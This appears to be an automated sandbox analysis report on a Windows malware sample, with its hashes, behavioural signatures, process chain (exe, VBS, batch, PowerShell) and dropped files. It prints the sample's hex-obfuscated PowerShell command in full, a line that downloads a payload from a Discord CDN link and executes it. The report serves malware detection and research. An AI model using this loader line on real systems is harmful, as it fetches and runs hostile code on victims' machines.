Analysis
-
max time kernel
136s -
max time network
138s -
platform
windows7_x64 -
resource
win7-en -
submitted
13-09-2021 17:28
Static task
static1
Behavioral task
behavioral1
Sample
0992c903425c04bb257f9dc5ae24f2f9315671b711ede082e5705bff5ddf6522.exe
Resource
win7-en
General
-
Target
0992c903425c04bb257f9dc5ae24f2f9315671b711ede082e5705bff5ddf6522.exe
-
Size
7KB
-
MD5
0152ba660d23a2bb6edda5078fc936fa
-
SHA1
253c14c6dd3e5aaa224b2cb6bfc9a53012896776
-
SHA256
0992c903425c04bb257f9dc5ae24f2f9315671b711ede082e5705bff5ddf6522
-
SHA512
8c2dbe5d3dce477f24d80b2221bc3ebd48bdc923bb599758e116ef4db05f91c392e484e0f46e072809108d11fc7433481f01b3f7d7a0e184114daad8ee5ab666
Malware Config
Extracted
https://cdn.discordapp.com/attachments/835468911642279977/886054903166947418/Dragon.jpg
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 7 872 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 872 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 872 powershell.exe -
Suspicious use of WriteProcessMemory 9 IoCs
Processes:
0992c903425c04bb257f9dc5ae24f2f9315671b711ede082e5705bff5ddf6522.exeWScript.execmd.exedescription pid process target process PID 2040 wrote to memory of 2008 2040 0992c903425c04bb257f9dc5ae24f2f9315671b711ede082e5705bff5ddf6522.exe WScript.exe PID 2040 wrote to memory of 2008 2040 0992c903425c04bb257f9dc5ae24f2f9315671b711ede082e5705bff5ddf6522.exe WScript.exe PID 2040 wrote to memory of 2008 2040 0992c903425c04bb257f9dc5ae24f2f9315671b711ede082e5705bff5ddf6522.exe WScript.exe PID 2008 wrote to memory of 568 2008 WScript.exe cmd.exe PID 2008 wrote to memory of 568 2008 WScript.exe cmd.exe PID 2008 wrote to memory of 568 2008 WScript.exe cmd.exe PID 568 wrote to memory of 872 568 cmd.exe powershell.exe PID 568 wrote to memory of 872 568 cmd.exe powershell.exe PID 568 wrote to memory of 872 568 cmd.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\0992c903425c04bb257f9dc5ae24f2f9315671b711ede082e5705bff5ddf6522.exe"C:\Users\Admin\AppData\Local\Temp\0992c903425c04bb257f9dc5ae24f2f9315671b711ede082e5705bff5ddf6522.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Microsoft\Windows\Squad.vbs"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Microsoft\Windows\Exec.bat" "3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -c "$link = 'https://cdn.discordapp.com/attachments/835468911642279977/886054903166947418/Dragon.jpg';$hex = '28 4E 65 77 2D 4F 62 6A 65 63 74 20 53 79 73 74 65 6D 2E 4E 65 74 2E 57 65 62 43 6C 69 65 6E 74 29 2E 44 6F 77 6E 6C 6F 61 64 53 74 72 69 6E 67 28 22 24 6C 69 6E 6B 22 29 20 7C 20 49 45 58';$hex.Split(' ') | forEach{[char]([convert]::toint16($_,16))} | forEach{$result=$result+$_};$result | iex"4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Exec.batMD5
53c8f257e3d32009e9e087dd8ed38da9
SHA1ed4f3487930634c56fc02e6d4272eb93a84d7836
SHA2563bb009df04fe062f749515ac36ff348958e8fbfb8897a6d6e0cb34f86e76dd3f
SHA51296c2b00f6c2b876fc0ad47ec68fa414c570c8903924c71d4428fa4878f88d8519a3bcd1c435b480a4959f58ad41802397897dc0ae4cda1a212bf656afe1a9332
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Squad.vbsMD5
232174031b9591e1add2320bf6da9f14
SHA13f2722464c176abc974441f21fbdeba071d67f5d
SHA2565694b52e005c385d6807e02e45af35cbe39af18bb31325901ac86a633ceb68f7
SHA512d675d843204b6aa7077376588dc6ba493a9c300f0f45403daaddb5c4ec8183dec856de966a3fd43e67423674a1240f294b36baec5defb567a474050baa6c51e5
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\key.binMD5
138a4669ce7b2e27012c9f4ffc3993fe
SHA120f6df71b5d0e20e6ffa7474e3f95cb87b5a8fd0
SHA25683a39301950ddd38becff29f6645556fa25b1eea21148a40ae26ecdafc603206
SHA512cae661b658bd171702614162c2da42fa42c72070a806535167a33923b94855f81504ca2e18b6584aba04650a303e29d1eaada86c6e57171a9badd28112a5e09d
-
memory/568-59-0x0000000000000000-mapping.dmp
-
memory/872-65-0x0000000002872000-0x0000000002874000-memory.dmpFilesize
8KB
-
memory/872-60-0x0000000000000000-mapping.dmp
-
memory/872-62-0x000007FEF1DF0000-0x000007FEF294D000-memory.dmpFilesize
11.4MB
-
memory/872-64-0x0000000002870000-0x0000000002872000-memory.dmpFilesize
8KB
-
memory/872-66-0x0000000002874000-0x0000000002877000-memory.dmpFilesize
12KB
-
memory/872-63-0x000000001B710000-0x000000001BA0F000-memory.dmpFilesize
3.0MB
-
memory/872-67-0x000000000287B000-0x000000000289A000-memory.dmpFilesize
124KB
-
memory/2008-57-0x000007FEFB651000-0x000007FEFB653000-memory.dmpFilesize
8KB
-
memory/2008-55-0x0000000000000000-mapping.dmp
-
memory/2040-53-0x0000000000270000-0x0000000000271000-memory.dmpFilesize
4KB